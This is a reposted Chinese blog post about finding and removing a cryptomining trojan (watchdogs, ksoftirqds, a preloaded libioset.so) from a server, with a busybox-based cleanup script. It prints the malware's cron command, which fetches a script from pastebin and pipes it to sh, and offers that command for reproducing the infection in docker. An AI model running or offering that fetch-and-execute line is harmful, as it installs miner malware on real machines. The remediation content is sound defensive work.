生活随笔
收集整理的這篇文章主要介紹了
服务器被植入挖矿木马的心酸过程
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
轉(zhuǎn)自?https://juejin.im/post/5aa0cc476fb9a028d82b5695
最近打開服務(wù)變得很慢,然后 CPU,內(nèi)存占用有達到了100%,打開網(wǎng)站都很慢,這個肯定很反常的,平時cpu不會達到那么高,因此netstat -ntlp 準(zhǔn)備看看端口占用是不是有什么異常,有的會看到cpu暫用情況,有的不會顯示,因為木馬屏蔽掉了相關(guān)的命令。
好了,不死心。然后我看下定時任務(wù),crontab -l
emmmm,
*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh這個任務(wù)我記得我沒有添加定時任務(wù)啊,還15分鐘執(zhí)行一次,我的天。
然后我就打算刪掉這個定時任務(wù),無論是 crontab -r 還是執(zhí)行修改定時任務(wù)配置文件,都無法刪掉這個定時任務(wù)
然后網(wǎng)上查下。
- top, ps -ef 無異常進程
- load average 穩(wěn)步飆升
- netstat 命令被刪除
- 嘗試建立大量22端口, 6379端口的內(nèi)網(wǎng)連接
- crontab 被添加定時挖礦腳本, 刪除無效
- jenkins漏洞(or 弱密碼?)侵入
- 嘗試root用戶ssh的免密登錄
- 嘗試redis內(nèi)網(wǎng)登錄
en,想起前兩天jenkins 升級了軟件,后來就很卡了系統(tǒng)。
因感染病毒后, ls等系統(tǒng)命令會被劫持, 需要busybox替代這些系統(tǒng)命令, 下面提供從busybox官方docker鏡像中提取的靜態(tài)編譯版busybox過程.
docker run --rm -itv /tmp/:/tmp busybox:uclibccp /bin/busybox /tmpexit宿主機即獲取到: /tmp/busybox
復(fù)現(xiàn)感染過程(docker環(huán)境被root感染模式)
docker與虛擬機環(huán)境有區(qū)別, 病毒行為會受限
docker run --rm -it -v /tmp:/tmp centos:latestyum install -y crontabs lsof e2fsprogs(curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh busybox top, busybox ps -ef此busybox為靜態(tài)編譯版, 不依賴so庫, 系統(tǒng)的ls等命令已被通過so庫的preload機制被病毒劫持, ls會導(dǎo)致/etc/cron.d/root文件被刷寫為病毒定時執(zhí)行命令.
發(fā)現(xiàn)比系統(tǒng)命令多兩個進程(進程個數(shù)跟cpu核數(shù)有關(guān)), 耗盡了所有cpu資源
/tmp/ksoftirqds/tmp/watchdogs查殺過程(系統(tǒng)命令已不可信, 操作優(yōu)先采用busybox)
systemctl stop crond chmod +x busybox && mv busybox /sbin/ busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts busybox rm /var/spool/cron/root && busybox touch /var/spool/cron/root && busybox chattr +i /var/spool/cron/rootbusybox rm /var/spool/cron/crontabs/root && busybox touch /var/spool/cron/crontabs/root && busybox chattr +i /var/spool/cron/crontabs/root busybox rm /etc/cron.d/root && busybox touch /etc/cron.d/root && busybox chattr +i /etc/cron.d/root busybox rm -rf /etc/cron.d/* busybox ls /etc/cron.dailybusybox ls /etc/cron.hourlybusybox ls /etc/cron.monthlybusybox ls /etc/cron.weekly /busybox rm /sbin/watchdogs/busybox rm /usr/sbin/watchdogs/busybox rm /etc/init.d/watchdogsbusybox find / -type f -name '*watchdogs*'|busybox xargs rm -f busybox pkill watchdogsbusybox pkill ksoftirqds刪除被preload的so庫busybox rm /usr/local/lib/libioset.sobusybox rm /etc/ld.so.preloadbusybox rm /etc/ld.so.cache驗證libioset.so被卸載lsof |grep usr/local/lib/libioset.so無輸出, 則該動態(tài)鏈接庫被卸載, 直接執(zhí)行驗證步驟;
有輸出, kill掉占用的進程, 重復(fù)執(zhí)行該步驟;
若反復(fù)執(zhí)行后無法成功卸載該動態(tài)鏈接庫, 請執(zhí)行服務(wù)器重啟操作.
重啟服務(wù)器
驗證步驟
busybox top # 查看系統(tǒng)負載crontab -l # 查看是否還有異常任務(wù)busybox chattr -i /etc/cron.d/root # 過一段時間查看是否有異常任務(wù)寫入如果這種方式還是沒清理掉
提供一份清理腳本:
service crond stopbusybox rm -f /etc/ld.so.preloadbusybox rm -f /usr/local/lib/libioset.sochattr -i /etc/ld.so.preloadbusybox rm -f /etc/ld.so.preloadbusybox rm -f /usr/local/lib/libioset.so# 清理異常進程busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9busybox rm -f /tmp/watchdogsbusybox rm -f /etc/cron.d/tomcatbusybox rm -f /etc/cron.d/rootbusybox rm -f /var/spool/cron/rootbusybox rm -f /var/spool/cron/crontabs/rootbusybox rm -f /etc/rc.d/init.d/watchdogsbusybox rm -f /usr/sbin/watchdogsldconfig# 再次清理異常進程busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9# 清理開機啟動項chkconfig watchdogs offchkconfig –del watchdogsservice crond startecho "Done, Please reboot!"
轉(zhuǎn)載于:https://www.cnblogs.com/rosepotato/p/10641207.html
總結(jié)
以上是生活随笔為你收集整理的服务器被植入挖矿木马的心酸过程的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。
